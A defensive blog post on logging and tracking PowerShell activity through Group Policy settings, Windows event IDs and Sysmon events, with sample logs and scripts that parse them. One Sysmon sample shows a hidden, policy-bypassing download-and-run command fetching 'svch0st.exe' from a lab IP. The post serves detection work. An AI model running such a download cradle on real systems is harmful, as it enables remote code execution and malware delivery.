In this blog post, we will cover how to track PowerShell activity. Let's start off with the Windows Event Log.
Logging PowerShell Activity
The majority of the PowerShell logging settings are found under Computer Configuration -> Policies -> Windows PowerShell.
Here are the options available to us:
Turn on Module Logging: produces event ID 800 and event ID 4103.
Turn on PowerShell Script Block Logging: produces event ID 4104.
Turn on PowerShell Transcription: records everything the user does within the PowerShell session.
For example:
**********************
Windows PowerShell transcript start
Start time: 20240522143937
Username: TESTDUMMY\Administrator
RunAs User: TESTDUMMY\Administrator
Configuration Name:
Machine: DUMMYC1 (Microsoft Windows NT 10.0.19045.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process ID: 17368
PSVersion: 5.1.19041.4412
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.4412
BuildVersion: 10.0.19041.4412
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20240522143956
**********************
PS C:\Users\Administrator> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : testdummy.com
IPv4 Address. . . . . . . . . . . : 192.168.109.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.109.1
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
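To turn the three options above on without opening the Group Policy editor (on a lab machine, for instance), here is an added example, not from the original post, that writes the same policy registry values that Group Policy sets; run it from an elevated prompt. The transcript output directory is an assumed value, so adjust it for your environment.

```powershell
# Added example (not from the original post): enable Module Logging, Script Block
# Logging and Transcription by writing the policy registry keys Group Policy would write.
# Run from an elevated PowerShell prompt. C:\PSTranscripts is an assumed path.

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module Logging -> event ID 800 / 4103. A module name of "*" covers every module.
New-Item -Path "$policyRoot\ModuleLogging\ModuleNames" -Force | Out-Null
New-ItemProperty -Path "$policyRoot\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$policyRoot\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# Script Block Logging -> event ID 4104.
New-Item -Path "$policyRoot\ScriptBlockLogging" -Force | Out-Null
New-ItemProperty -Path "$policyRoot\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null

# Transcription -> per-session text transcripts like the one shown above.
New-Item -Path "$policyRoot\Transcription" -Force | Out-Null
New-ItemProperty -Path "$policyRoot\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$policyRoot\Transcription" -Name EnableInvocationHeader -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$policyRoot\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts' -PropertyType String -Force | Out-Null  # assumed path

# Verify what is now in place; a new PowerShell session picks the settings up.
Get-ItemProperty -Path "$policyRoot\ModuleLogging", "$policyRoot\ScriptBlockLogging", "$policyRoot\Transcription" |
    Select-Object PSChildName, EnableModuleLogging, EnableScriptBlockLogging, EnableTranscripting, OutputDirectory
```

Point the transcript directory at a location users cannot modify (or forward the files off the host), since transcripts are plain text files that the logged user could otherwise edit or delete.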
Windows Event Log
Event ID: 4688 Process has been created
Allows us to know when PowerShell was started.
From the picture below, we can see that powershell.exe was started on May 23, 2024 @ 1:45:35.
Additionally, in Windows, each external command you run is started as its own separate process. As you can see from the picture below, the process ID of powershell.exe (5372) is the parent process ID of whoami.exe. What does that mean? It means that a user opened PowerShell and ran the whoami command.
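The parent/child relationship described above can be rebuilt from the event log rather than read off a screenshot. The following is an added example, not code from the original post: it reads Security event ID 4688, matches each event's creator process ID to the new process ID of an earlier powershell.exe start, and lists the child processes. It assumes "Audit Process Creation" (and, for the CommandLine field, command-line auditing) is enabled and that you run it with rights to read the Security log.

```powershell
# Added example (not from the original post): link child processes to the
# powershell.exe that spawned them using Security event ID 4688.
# Assumes Audit Process Creation is enabled and the Security log is readable.

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 2000 -ErrorAction Stop

function Get-EventData {
    # Turn the EventData <Data Name="..."> elements into a name -> value hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $data
}

$records = $events | ForEach-Object {
    $d = Get-EventData $_
    [pscustomobject]@{
        Time     = $_.TimeCreated
        PidHex   = $d['NewProcessId']     # hex string such as 0x14fc
        Image    = $d['NewProcessName']
        ParentId = $d['ProcessId']        # creator process ID, also hex
        CmdLine  = $d['CommandLine']      # empty unless command-line auditing is on
    }
}

# Index PowerShell starts by PID, then find events whose creator PID matches one of them.
# Caveat: PIDs are reused, so also compare timestamps before drawing conclusions.
$psStarts = $records | Where-Object { $_.Image -like '*\powershell.exe' } |
    Group-Object PidHex -AsHashTable -AsString
if (-not $psStarts) { $psStarts = @{} }

$records | Where-Object { $_.ParentId -and $psStarts.ContainsKey($_.ParentId) } |
    Select-Object Time,
        @{ n = 'ParentPid'; e = { [int]$_.ParentId } },
        @{ n = 'ChildPid';  e = { [int]$_.PidHex } },
        Image, CmdLine |
    Format-Table -AutoSize
```

In the post's scenario this prints a row whose ParentPid is 5372 and whose Image ends in whoami.exe.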
Event ID: 400 PowerShell Logging
This event ID is similar to event ID 4688. The only difference is that this event ID is only recorded when PowerShell is started.
Details:
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.19041.4412
HostId=be286975-3018-400f-b789-f596ce246438
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.4412
RunspaceId=a738cd72-eb7d-4c73-80bf-091eea0eaa39
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Event ID: 800 & 4103 Module loading and Add-Type logging
Logs the activity of all loaded modules.
Event ID: 4104 Script Block logging
Logs the PowerShell script block. If a long PowerShell script is run, it is divided into multiple parts, each recorded as its own 4104 event.
Example:
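Because a long script arrives as several 4104 events, reviewing it means putting the pieces back together. As an added example that is not part of the original post, the script below reads 4104 events from the Microsoft-Windows-PowerShell/Operational log, groups them by ScriptBlockId, orders the pieces by MessageNumber and joins the text; it also flags blocks that PowerShell itself logged at Warning level and blocks where some parts are missing (for instance because the log rolled over).

```powershell
# Added example (not from the original post): reassemble script blocks that
# event ID 4104 split across multiple events.

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 5000 -ErrorAction Stop

$pieces = foreach ($e in $events) {
    $xml = [xml]$e.ToXml()
    $d = @{}
    foreach ($x in $xml.Event.EventData.Data) { $d[$x.Name] = $x.'#text' }
    [pscustomobject]@{
        ScriptBlockId = $d['ScriptBlockId']
        Number        = [int]$d['MessageNumber']
        Total         = [int]$d['MessageTotal']
        Text          = $d['ScriptBlockText']
        Path          = $d['Path']              # empty when the block came from the command line
        Time          = $e.TimeCreated
        Level         = $e.LevelDisplayName     # "Warning" = PowerShell flagged the block as suspicious
    }
}

$scripts = $pieces | Group-Object ScriptBlockId | ForEach-Object {
    $ordered = @($_.Group | Sort-Object Number)
    [pscustomobject]@{
        ScriptBlockId = $_.Name
        FirstSeen     = $ordered[0].Time
        Parts         = $ordered.Count
        Expected      = $ordered[0].Total
        Complete      = ($ordered.Count -eq $ordered[0].Total)   # false if parts were lost
        Warning       = [bool]($ordered | Where-Object { $_.Level -eq 'Warning' })
        Path          = $ordered[0].Path
        FullText      = -join $ordered.Text                      # the reassembled script
    }
}

# Largest (most fragmented) blocks first; FullText is what you actually review.
$scripts | Sort-Object Parts -Descending |
    Select-Object FirstSeen, Parts, Expected, Complete, Warning, Path |
    Format-Table -AutoSize
```

A block that is flagged Warning, or that has no Path (it was typed or passed in rather than run from a .ps1 file), is a reasonable place to start when triaging.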
Sysmon Events
Event ID: 1 Process Creation
Tracks when a process has been created and the command line that the process ran.
Example:
Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2024-05-23 19:03:05.132
ProcessGuid: {e58af071-92e9-664f-4204-000000002500}
ProcessId: 18232
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://192.168.109.6:9000/svch0st.exe'))"
CurrentDirectory: C:\Users\Administrator\
User: TESTDUMMY\Administrator
LogonGuid: {e58af071-f906-664e-5117-120000000000}
LogonId: 0x121751
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=801262E122DB6A2E758962896F260B55BBD0136A,MD5=2E5A8590CF6848968FC23DE3FA1E25F1,SHA256=9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3,IMPHASH=3D08F4848535206D772DE145804FF4B6
ParentProcessGuid: {e58af071-92d4-664f-4004-000000002500}
ParentProcessId: 16720
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ParentUser: TESTDUMMY\Administrator
Event ID: 7 Image Loaded
A better source for gaining visibility into PowerShell, since it records any process that loads the PowerShell engine: focus on the image loads of System.Management.Automation.dll and System.Management.Automation.ni.dll.
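To act on that, here is an added example that is not from the original post: it reads Sysmon event ID 7 from the Microsoft-Windows-Sysmon/Operational log, keeps only loads of the two engine DLLs named above, and lists which processes loaded them, marking any host binary that is not one of the usual PowerShell executables. It assumes Sysmon is installed and its configuration includes an ImageLoad rule that covers these DLLs.

```powershell
# Added example (not from the original post): find every process that loaded the
# PowerShell engine using Sysmon event ID 7 (Image Loaded).
# Assumes Sysmon is installed with an ImageLoad rule covering these DLLs.

$engineDlls = 'System.Management.Automation.dll', 'System.Management.Automation.ni.dll'

$loads = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } `
    -MaxEvents 20000 -ErrorAction Stop |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($x in $xml.Event.EventData.Data) { $d[$x.Name] = $x.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Image       = $d['Image']          # the process doing the loading
            ImageLoaded = $d['ImageLoaded']    # the DLL that was loaded
            ProcessId   = $d['ProcessId']
            User        = $d['User']           # absent in older Sysmon versions
            Signed      = $d['Signed']
        }
    } |
    Where-Object { $engineDlls -contains (Split-Path $_.ImageLoaded -Leaf) }

# Hosts other than the normal PowerShell binaries are the interesting ones:
# the engine can be embedded in any .NET process.
$expectedHosts = 'powershell.exe', 'powershell_ise.exe', 'pwsh.exe'

$loads | Group-Object Image | Sort-Object Count -Descending |
    Select-Object Count, Name,
        @{ n = 'Unusual'; e = { $expectedHosts -notcontains (Split-Path $_.Name -Leaf) } } |
    Format-Table -AutoSize
```

Rows marked Unusual are processes that are running PowerShell without powershell.exe ever appearing in 4688 or Sysmon event 1, which is exactly the gap this event closes.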
Event ID: 10 Process accessed another process
This event ID tracks when one process accesses another process.
Example:
Process accessed:
RuleName: technique_id=T1055.001,technique_name=Dynamic-link Library Injection
UtcTime: 2024-05-23 01:55:15.261
SourceProcessGUID: {e58af071-96c2-664f-6e04-000000002500}
SourceProcessId: 19452
SourceThreadId: 14772
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetProcessGUID: {e58af071-ad33-664f-a704-000000002500}
TargetProcessId: 16164
TargetImage: C:\Windows\system32\whoami.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9e9c4|C:\Windows\System32\KERNELBASE.dll+59655|C:\Windows\System32\KERNELBASE.dll+566d6|C:\Windows\System32\KERNEL32.DLL+1cec4|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+3512b6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3c09|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\9027dc90269bbcb49452585e8fd17bdd\System.ni.dll+2b3579|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12826a9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1198b2a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+12441cd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1243e8b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d7c44cac86eb32467f847ca506483629\System.Management.Automation.ni.dll+1319e8f|UNKNOWN(00007FFA3BAC6611)
SourceUser: TESTDUMMY\Administrator
TargetUser: TESTDUMMY\Administrator
Looking at the event above, we see that PowerShell was seen accessing whoami.exe.